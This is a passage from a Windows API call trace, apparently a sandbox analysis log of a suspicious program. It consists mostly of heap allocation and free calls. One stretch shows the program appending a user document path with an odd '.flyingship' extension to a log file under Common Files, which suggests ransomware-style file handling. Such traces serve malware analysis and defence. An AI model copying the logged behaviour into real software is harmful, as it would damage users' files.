(HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ae18 [0179.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbca008 [0179.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.428] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0179.428] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x138 [0179.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f424 | out: lpNewFilePointer=0x0) returned 1 [0179.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.429] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0179.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0xbda010 [0179.430] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.430] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0179.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f414 | out: lpNewFilePointer=0x0) returned 1 [0179.431] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x1acb, lpOverlapped=0x0) returned 1 [0179.431] ReadFile (in: hFile=0x138, lpBuffer=0xbca008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0xbca008*, lpNumberOfBytesRead=0x87f43c*=0x0, lpOverlapped=0x0) returned 1 [0179.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x1acb, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0179.431] SetFilePointerEx (in: hFile=0x138, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x87f404 | out: lpNewFilePointer=0x0) returned 1 [0179.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbda010 | out: hHeap=0x8a0000) returned 1 [0179.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0179.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\n", cchWideChar=95, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 95 [0179.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x5f) returned 0x9a5d10 [0179.431] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\n", cchWideChar=95, lpMultiByteStr=0x9a5d10, cbMultiByte=95, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\x6khSA9uDUZMBxf\\orhLGiSQMqRNAIhM\\T8zO.flyingship.ots\r\n", lpUsedDefaultChar=0x0) returned 95 [0179.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0179.431] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x9a5d78 [0179.431] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d10 | out: hHeap=0x8a0000) returned 1 [0179.431] WriteFile (in: hFile=0x138, lpBuffer=0x9a5d78*, nNumberOfBytesToWrite=0x5e, lpNumberOfBytesWritten=0x87f43c, lpOverlapped=0x0 | out: lpBuffer=0x9a5d78*, lpNumberOfBytesWritten=0x87f43c*=0x5e, lpOverlapped=0x0) returned 1 [0179.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9a5d78 | out: hHeap=0x8a0000) returned 1 [0179.432] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0179.432] CloseHandle (hObject=0x138) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ae18 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0179.433] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fff00 | out: hHeap=0x8a0000) returned 1 [0179.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0179.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0179.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0179.435] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deb78 | out: hHeap=0x8a0000) returned 1 [0179.435] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90add8 | out: hHeap=0x8a0000) returned 1 [0179.436] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0f0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de858 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e6cd8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7b0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9c70 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0179.436] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0179.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.437] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0179.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0179.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0179.437] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.437] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0179.437] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0179.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ad0 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0179.438] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba078 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0179.438] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.438] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0179.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0179.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0179.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0179.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0179.439] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0179.439] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b10 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0179.440] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.440] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0179.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0179.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba408 [0179.441] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.441] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba000 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.442] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0179.442] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18c0 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba540 [0179.443] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.443] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.443] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b10 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0179.444] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b10 | out: hHeap=0x8a0000) returned 1 [0179.444] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 